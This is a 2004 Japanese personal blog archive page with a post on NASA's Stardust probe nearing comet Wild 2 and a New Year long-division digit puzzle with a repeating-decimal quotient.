「Shields Up」はスタートレックシリーズで言うところの「防御シールドを張れ!」。1999 年 2 月に打ち上げられ惑星間ダストの収集をしながら 32 億 2000 万 km の宇宙の旅を続けてきた NASA の宇宙探査機 Stardust が、いよいよ日本時間の明日未明(3 日午前 4 時 40 分頃)に彗星 Wild 2 に最接近します。Wild 2 からわずか 300km の距離の彗星ダストの嵐の中を相対速度時速 22000km で通過しながらダストを収集するという過酷なミッションですが、塵から探査機本体を守るために機体の向きを変えて盾を構える(シールドを張る)など、準備は万端のようです。Stardust は集めた塵を抱えて 2 年後の 2006 年 1 月に地球に帰還する予定になっています。

Mission Status Center (Spaceflight Now)→@nifty 翻訳

Welcome to Stardust! (NASA JPL)

NASA SPACECRAFT HAS SHIELDS UP (12 月 31 日)→@nifty 翻訳

関連

NASA が開発した最も軽い固体(2002 年 5 月 10 日の日記)

頭の体操

| コメント(0)

今年もよろしくお願いします……ということで、虫食い算を作ってみました。除数*1と被除数*2が共に整数で、商*3が循環小数*4になっている割り算の虫食い算です。「□」に 0~9 の数字を 1 つずつ入れて割り算を完成させてください。2 桁以上の場所では先頭の「□」に 0 を入れることはできません。数字が 1 つも書いてありませんが、0 を下ろす場所だけわかりやすいようにグレーに塗っておきました。

*1 除数…割る数。*2 被除数…割られる数。*3 商…割り算の答え。*4 循環小数…小数点以下のあるところから決まった数字の並びが無限に繰り返される数で、繰り返しの先頭と末尾の数字の上に「・」を付けて表記される。

虫食い算

このアーカイブについて

このページには、2004年1月に書かれた記事が新しい順に公開されています。

前のアーカイブは2003年12月です。

次のアーカイブは2004年2月です。

最近のコンテンツはインデックスページで見られます。過去に書かれたものはアーカイブのページで見られます。

月別 アーカイブ

ウェブページ

Powered by Movable Type 6.3.3